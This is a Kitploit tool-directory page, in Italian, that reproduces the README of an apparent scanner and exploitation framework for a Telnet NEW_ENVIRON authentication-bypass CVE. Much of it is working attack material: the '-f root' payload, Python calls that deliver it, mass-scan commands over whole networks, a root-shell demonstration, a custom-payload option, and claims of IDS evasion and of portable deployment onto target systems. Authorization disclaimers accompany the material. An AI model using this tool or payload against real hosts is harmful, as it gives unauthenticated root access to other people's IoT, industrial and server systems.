Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Terrminus-CVE-2026-2406 — AsyncIO Scanner & Exploitation Framework per CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass). Include scoperta ad alta concorrenza, fingerprinting passivo ed escalation autorizzata a shell di root. | Kitploit
Strumenti/GitHubGitHub/ridpath/terrminus-cve-2026-2406
Escalation di PrivilegiRicognizioneScanner di VulnerabilitàSicurezza IoTExploitSicurezza SCADA/ICSRaccolta InformazioniSicurezza WebSicurezza di Rete

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Penetration Testing
Red Teaming
GitHubridpath/terrminus-cve-2026-2406

Terrminus-CVE-2026-2406

AsyncIO Scanner & Exploitation Framework per CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass). Include scoperta ad alta concorrenza, fingerprinting passivo ed escalation autorizzata a shell di root.

Vedi Repository
26 mesi faNon ancora revisionato

Terminus - Scanner e Framework di Sfruttamento per CVE-2026-24061

Un motore di analisi della sicurezza per la vulnerabilità di bypass dell'autenticazione ed escalation dei privilegi Telnet NEW_ENVIRON CVE-2026-24061.

Terminus


Panoramica

Terminus è uno strumento professionale di ricerca sulla sicurezza progettato per test di penetrazione autorizzati e valutazione delle vulnerabilità di CVE-2026-24061. Questa vulnerabilità critica colpisce le implementazioni legacy dei daemon Telnet, consentendo a utenti remoti non autenticati di bypassare l'autenticazione e ottenere accesso a livello root.

Cos'è CVE-2026-24061?

CVE-2026-24061 è una vulnerabilità di Esecuzione Remota di Codice nei servizi Telnet che supportano RFC 1572 (Opzione Ambiente Telnet). La vulnerabilità sfrutta una sanificazione impropria della variabile d'ambiente USER durante la subnegoziazione NEW_ENVIRON:

  • Autenticazione normale: USER=john → richiede la password
  • Payload dell'exploit: USER=-f root → bypassa l'autenticazione, concede una shell root

Impatto:

  • Bypass completo dell'autenticazione (nessuna password richiesta)
  • Escalation immediata dei privilegi a root
  • Compromissione totale del sistema

Servizi interessati:

  • Telnet GNU Inetutils telnetd legacy (in particolare le versioni fino alla 2.7)
  • Firmware IoT con implementazioni Telnet vulnerabili
  • Sistemi di controllo industriale con servizi Telnet obsoleti

Caratteristiche Principali

Scanner di Vulnerabilità di Massa

  • Scansione ad Alta Concorrenza: Scansiona oltre 1.000 target contemporaneamente usando AsyncIO
  • Supporto CIDR: Scansiona interi intervalli di rete (192.168.0.0/24, 10.0.0.0/8)
  • Doppia Modalità di Rilevamento:
    • Passiva (predefinita): Rilevamento rapido, sicuro e basato su firme
    • Verifica Attiva (--verify): Proof-of-exploit, conferma l'accesso root uid=0
  • Analisi del Banner: Fingerprinting dei tipi e delle versioni dei daemon
  • Punteggio del Rischio: Valutazione della fiducia a più livelli (CRITICO, ALTO, MEDIO, BASSO)

Motore di Protocollo Conforme a RFC

  • Classe TerminusNegotiator: API pulita per le operazioni del protocollo Telnet
    • Terminus.handshake() - Handshake conforme a RFC 854
    • Terminus.exploit() - Consegna del payload per CVE-2026-24061
  • Negoziazione Corretta delle Opzioni: Evita il rilevamento IDS/IPS tramite la conformità al protocollo
  • Macchina a Stati: Gestione robusta delle sequenze IAC (DO/DONT/WILL/WONT/SB/SE)

Sfruttamento Gated dall'Autorizzazione

  • Shell Interattiva: Shell completa post-sfruttamento con accesso root
  • Esecuzione di Comandi: Esegue singoli comandi e cattura l'output
  • Raccolta di Prove: Raccoglie uid, variabili d'ambiente, informazioni di sistema
  • Meccanismi di Sicurezza:
    • Richiede il flag esplicito --exploit
    • Disabilitato in modalità di scansione batch
    • Registrazione di audit di tutti i tentativi di sfruttamento

Reportistica Multi-Formato

  • Terminale: Tabelle ricche con livelli di rischio codificati a colori
  • JSON: Integrazione SIEM/SOAR
  • CSV: Tracciamento tramite fogli di calcolo
  • HTML: Report dettagliati con statistiche
  • Markdown: Output adatto alla documentazione

Architettura

Motore Principale: TerminusNegotiator

Il cuore di Terminus è la classe TerminusNegotiator, che fornisce una separazione pulita tra la gestione del protocollo e la logica di sfruttamento:```python from terminus import TerminusNegotiator

Initialize engine

negotiator = TerminusNegotiator()

Step 1: RFC 854 compliant handshake

await negotiator.handshake(target="192.168.1.100", port=23)

Step 2: Deliver CVE-2026-24061 payload

result = await negotiator.exploit(payload="-f root")

if result.success: print(f"Root shell acquired: {result.evidence['uid']}")

root@kitploit:~
### Approccio Motore vs. Script

**Script tradizionali** (strumenti esistenti):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell

Motore Terminus:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report

root@kitploit:~
---

## Installazione

### Requisiti
- **Python 3.10+**
- **Piattaforme supportate:**
  - Windows 10/11 (PowerShell)
  - Windows + WSL2 (Kali Linux, Parrot OS, Ubuntu)
  - Linux nativo (Kali, Parrot, Ubuntu, Debian)
  - macOS (con Python 3.10+)

### Avvio rapido (Tutte le piattaforme)

#### Windows (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git

# Run setup script
.\setup_env.ps1

# Activate virtual environment
.venv\Scripts\Activate.ps1

# Verify installation
terminus --version

Linux / WSL2 / macOS (Bash)```bash

Clone repository

git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406

Run setup script

chmod +x setup_env.sh ./setup_env.sh

Activate virtual environment

source venv/bin/activate

Verify installation

terminus --version

root@kitploit:~
#### Installazione Manuale (Tutte le Piattaforme)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406

# Create virtual environment
python3 -m venv venv

# Activate (Linux/macOS/WSL)
source venv/bin/activate

# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1

# Install dependencies
pip install -e .

# Verify
terminus --version

Dipendenze (Cross-Platform)

  • telnetlib3 - Implementazione del protocollo Telnet AsyncIO
  • rich - UI e formattazione del terminale (supporto ANSI su Windows/Linux)
  • pydantic - Validazione dei dati e modelli
  • aiofiles - I/O asincrono dei file
  • jinja2 - Templating dei report
  • pyyaml - Gestione della configurazione
  • pathlib - Gestione dei percorsi cross-platform (integrato)

Nota: Tutte le dipendenze sono puramente Python o dispongono di wheel cross-platform. Nessuna compilazione specifica per piattaforma richiesta.


Completamento Shell (Opzionale)

Abilita il completamento con tab per un inserimento più rapido dei comandi:

Bash```bash

_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc

root@kitploit:~
### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc

Fish```bash

_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish

root@kitploit:~
### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression

Provalo:```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.

root@kitploit:~
---

## Utilizzo

### Modalità di Scansione

#### Scansione di un Singolo Target```bash
terminus scan -t 192.168.1.100

Scansione Intervallo CIDR```bash

terminus scan -t 192.168.1.0/24

root@kitploit:~
#### Scansione Batch Basata su File```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500

Scansione di Rete ad Alta Concorrenza```bash

terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200

root@kitploit:~
### Modalità di Rilevamento

#### Rilevamento Passivo (Predefinito - Sicuro)```bash
terminus scan -t target.com --passive-only

Rilevamento Aggressivo (Tutte le Euristiche)```bash

terminus scan -t target.com --aggressive

root@kitploit:~
#### Modalità di Verifica Attiva (Proof-of-Exploit)```bash
terminus scan -t 192.168.1.100 --verify

Usage

Dimostrazione dal vivo

Controlla la versione:```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db

root@kitploit:~
**Scansione passiva (predefinita - valutazione del rischio conservativa):**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Parsing 1 targets...
Found 1 valid targets

  Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 0 0:00:00

╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061      │
│ Total Targets: 1         │
│ Scanned: 1               │
│ Failed: 0                │
│ Timeouts: 0              │
│                          │
│ Vulnerability Breakdown: │
│   Critical: 0            │
│   High: 0                │
│   Medium: 0              │
│   Low: 1                 │
│   Info: 0                │
│                          │
│ Duration: 3.53s          │
│ Avg Scan Time: 3522.22ms │
│                          │
╰──────────────────────────╯

                                 Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target        │ Port │  Status   │ Risk │ Daemon  │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Low  │ unknown │ Unknown │     YES     │    -     │       3522.22 │
╰───────────────┴──────┴───────────┴──────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

No vulnerable targets found

Verifica attiva con --verify (proof-of-exploit):```powershell PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323 --verify

================================================================ TERMINUS CVE-2026-24061 Scanner & Exploitation Framework

Parsing 1 targets... Found 1 valid targets

Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 1 0:00:00

╭────── Scan Summary ──────╮ │ CVE: CVE-2026-24061 │ │ Total Targets: 1 │ │ Scanned: 1 │ │ Failed: 0 │ │ Timeouts: 0 │ │ │ │ Vulnerability Breakdown: │ │ Critical: 1 │ │ High: 0 │ │ Medium: 0 │ │ Low: 0 │ │ Info: 0 │ │ │ │ Duration: 8.04s │ │ Avg Scan Time: 8029.55ms │ │ │ ╰──────────────────────────╯

root@kitploit:~
                               Terminus - CVE-2026-24061 Scan Results

╭───────────────┬──────┬───────────┬──────────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮ │ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │ ├───────────────┼──────┼───────────┼──────────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤ │ 172.17.45.122 │ 2323 │ completed │ Critical │ unknown │ Unknown │ YES │ ROOT │ 8029.55 │ ╰───────────────┴──────┴───────────┴──────────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

Found 1 vulnerable targets!

root@kitploit:~
**Sfruttamento interattivo:**```powershell
PS C:terminus> python -m terminus exploit -t 172.17.45.122 -p 2323 --yes

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Attempting exploitation of 172.17.45.122:2323...
Payload: -f root

CVE-2026-24061 exploitation attempt initiated with payload: -f root
CVE-2026-24061 exploitation SUCCESSFUL - root access obtained

[*] CVE-2026-24061 Interactive Shell Started
[*] Type 'exit' or press Ctrl+C to quit

whoami
root
┌──[root@parrot]─[~]
└──╼ #

Osservazioni chiave:

  • Modalità passiva: Rilevato supporto NEW_ENVIRON ma rischio segnalato come BASSO (conservativo)
  • Verifica attiva: Confermato accesso root (uid=0), rischio elevato a CRITICO con stato di verifica "ROOT"
  • Sfruttamento: Shell root immediata senza richiesta di password

Cosa fa:

  • Esegue prima il rilevamento passivo (banner + analisi del protocollo)
  • Se si sospetta una vulnerabilità, tenta lo sfruttamento effettivo con payload -f root
  • Conferma l'accesso root controllando uid=0 nella risposta
  • Eleva il rischio a CRITICO quando l'accesso root è confermato
  • Emette lo stato di verifica nei risultati della scansione

Casi d'uso:

  • Validazione ad alta affidabilità per report di conformità
  • Dimostrazioni proof-of-concept
  • Conferma della sfruttabilità prima di segnalare ai vendor
  • Operazioni red team che richiedono raccolta di prove

Esempio di output:``` Target Port Status Daemon Risk Verified 192.168.1.100 23 VULNERABLE inetutils-telnetd CRITICAL ROOT ACCESS 192.168.1.101 23 VULNERABLE netkit-telnetd HIGH Not tested 192.168.1.102 23 SAFE OpenBSD-telnetd LOW N/A

root@kitploit:~
**Verifica in batch:**```bash
terminus scan -f targets.txt --verify -o json -w verified_results.json

Nota: La verifica attiva tenta lo sfruttamento. Utilizzare solo con la dovuta autorizzazione.

Formati di Output

Output JSON```bash

terminus scan -t 192.168.1.0/24 -o json > results.json

root@kitploit:~
#### Report HTML```bash
terminus scan -f targets.txt -o html -w report.html

Esportazione CSV```bash

terminus scan -t 10.0.0.0/24 -o csv > vulnerabilities.csv

root@kitploit:~
### Exploitation (Solo Uso Autorizzato)

#### Shell Interattiva```bash
terminus exploit -t 192.168.1.100
# Requires confirmation prompt
# Grants root shell on vulnerable target

Esecuzione dei comandi```bash

terminus exploit -t 192.168.1.100 -c "id"

Output: uid=0(root) gid=0(root) groups=0(root)

root@kitploit:~
#### Payload Personalizzato```bash
terminus exploit -t 192.168.1.100 --payload "-f admin"

Comandi di utilità

Aggiornamento delle firme delle vulnerabilità```bash

terminus update-signatures

root@kitploit:~
#### Verifica i risultati precedenti```bash
terminus verify -f results.json

Mostra Versione e Firme```bash

terminus version

root@kitploit:~
---

## Configurazione dell'Ambiente di Test

### Per il Red Team: Distribuzione Cross-Platform

**Terminus è progettato per la distribuzione portatile** - copia la directory su qualsiasi sistema Windows/Linux ed eseguilo senza installazione:```bash
# Copy terminus directory to target system
# No hardcoded paths - everything is relative

# Run directly (no installation needed)
cd terminus
python3 -m terminus scan -t 192.168.1.0/24

# All output stays in project directory:
# - Logs: ./logs/terminus.log
# - Reports: ./reports/
# - Config: ./config.yaml

Ambiente di Test WSL2 (Windows)

Consigliato per workstation Red Team Windows - ambiente Linux isolato per distribuire servizi di test vulnerabili:

Installare WSL2 con Kali o Parrot```powershell

Windows PowerShell (Admin)

Install WSL2

wsl --install

Install Kali Linux

wsl --install -d kali-linux

OR Install Parrot OS (if available)

wsl --install -d ParrotOS

Verify

wsl -l -v

root@kitploit:~
#### Dentro di WSL2 (Kali/Parrot)```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install Terminus dependencies
sudo apt install python3 python3-pip python3-venv

# Install testing tools
sudo apt install netkit-telnetd telnetd wireshark tcpdump

# Clone and setup Terminus
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406
cd Terminusb-CVE-2026-2406
./setup_env.sh
source venv/bin/activate

Distribuisci il Servizio di Test Vulnerabile (Solo WSL2)

ATTENZIONE: Solo in ambienti di laboratorio isolati. Mai su sistemi di produzione.```bash

Inside WSL2

Install vulnerable netkit-telnetd version

sudo apt install netkit-telnetd=0.17-*

Configure for NEW_ENVIRON support

Edit /etc/inetd.conf to enable telnet

Start service

sudo systemctl restart inetd

Test from Windows host

From PowerShell:

terminus scan -t $(wsl hostname -I)

root@kitploit:~
### Matrice di Test Cross-Platform

Testa Terminus su tutte le piattaforme utilizzate dal tuo Red Team:

| Piattaforma | Installazione | Scansione | Exploitation |
|----------|-------------|----------|--------------|
| Windows 10/11 (PowerShell) | Sì | Sì | Sì |
| WSL2 - Kali Linux | Sì | Sì | Sì |
| WSL2 - Parrot OS | Sì | Sì | Sì |
| WSL2 - Ubuntu | Sì | Sì | Sì |
| Kali Linux nativo | Sì | Sì | Sì |
| Parrot OS nativo | Sì | Sì | Sì |
| macOS | Sì | Sì | Sì |

---

## Riferimento API

### Integrazione Python```python
import asyncio
from terminus import TerminusScanner, TerminusExploiter, TerminusNegotiator
from terminus.reporting.models import RiskScore

async def scan_network():
    # High-level scanner
    async with TerminusScanner() as scanner:
        async for result in scanner.scan_targets(["192.168.1.0/24"]):
            if result.risk_score == RiskScore.CRITICAL:
                print(f"CRITICAL: {result.target}")
                print(f"   Daemon: {result.daemon_type} {result.version}")
                print(f"   Confidence: {result.vulnerability_confidence:.2%}")

async def exploit_target():
    # Direct engine usage
    negotiator = TerminusNegotiator()
    
    # Handshake
    success = await negotiator.handshake(target="192.168.1.100", port=23)
    if not success:
        print("Handshake failed")
        return
    
    # Exploit
    result = await negotiator.exploit(payload="-f root")
    if result.success:
        print(f"Root access obtained")
        print(f"Evidence: {result.evidence}")

# Run
asyncio.run(scan_network())

Sicurezza ed Etica

Avviso Legale

Questo strumento è destinato SOLO a:

  • Test di penetrazione autorizzati
  • Ricerca sulla sicurezza in ambienti controllati
  • Competizioni CTF e laboratori didattici
  • Valutazioni di sicurezza difensive con autorizzazione scritta

L'uso non autorizzato è ILLEGALE e non etico.

Meccanismi di Sicurezza

  1. Autorizzazione Richiesta: Lo sfruttamento richiede il flag esplicito --exploit
  2. Prompt di Conferma: Conferma interattiva prima dello sfruttamento
  3. Registrazione di Audit: Tutti i tentativi di sfruttamento vengono registrati con timestamp
  4. Applicazione di un Singolo Target: Lo sfruttamento è disabilitato nella modalità di scansione batch
  5. Limitazione della Velocità: Previene DoS accidentali durante la scansione

Divulgazione Responsabile

Se scopri sistemi vulnerabili utilizzando Terminus:

  1. NON sfruttare sistemi senza autorizzazione scritta
  2. Segnala i risultati ai proprietari dei sistemi tramite divulgazione responsabile
  3. Documenta i risultati utilizzando le funzionalità di reportistica di Terminus
  4. Segui le linee guida per la divulgazione coordinata delle vulnerabilità

Riferimenti

Informazioni CVE

  • ID CVE: CVE-2026-24061
  • Gravità: CRITICA (CVSS 9.8)
  • Vettore: Rete, Non autenticato, Bassa complessità

Ricerca e Implementazione

  • Ricerca Primaria: SafeBreach-Labs CVE-2026-24061
  • Exploit di Riferimento: telnet_rce.py
  • Scanner Batch: TryA9ain CVE-2026-24061

Standard di Protocollo

  • RFC 854: Specifica del Protocollo Telnet
  • RFC 1572: Opzione Ambiente Telnet

Test e Validazione

Copertura dei Test

  • Copertura del codice superiore al 90% con pytest
  • Test unitari per tutti i moduli principali
  • Test di integrazione con server Telnet simulato
  • Benchmark delle prestazioni (1.000 target < 60 secondi)

Checklist di Test Manuale

  • Scansione del servizio vulnerabile (verifica del rilevamento)
  • Scansione del servizio corretto (verifica di nessun falso positivo)
  • Test del bypass dell'autenticazione (nessun prompt per la password)
  • Verifica dell'elevazione dei privilegi (uid=0)
  • Monitoraggio degli avvisi IDS (verifica della stealth)
  • Test delle prestazioni (1.000+ target)

Configurazione

config.yaml (Cross-Platform)

Tutti i percorsi sono relativi alla radice del progetto - funziona su Windows, Linux e WSL senza modifiche:```yaml

config.yaml - Cross-platform configuration

All paths relative to project directory

scanner: default_port: 23 connect_timeout: 3.0 handshake_timeout: 5.0 max_concurrent: 1000 rate_limit: 100 # connections/second

detection: passive_only: true # Safe mode by default banner_timeout: 2.0 heuristic_checks: true

Signature database (relative path)

signatures_db: "./signatures.db"

exploit: require_authorization: true default_payload: "-f root" evidence_collection: true interactive_shell: true

reporting: default_format: "terminal" include_safe_targets: false verbosity: "normal"

Output directory (relative path - works on Windows/Linux)

output_dir: "./reports"

logging: level: "INFO"

Log file (relative path - automatic directory creation)

file: "./logs/terminus.log" format: "json" console_enabled: true


Acknowledgments

  • SafeBreach Labs: Original CVE-2026-24061 research and exploit implementation
  • TryA9ain: Batch scanning approach inspiration
  • RFC Authors: Telnet protocol specifications

Scarica lo strumento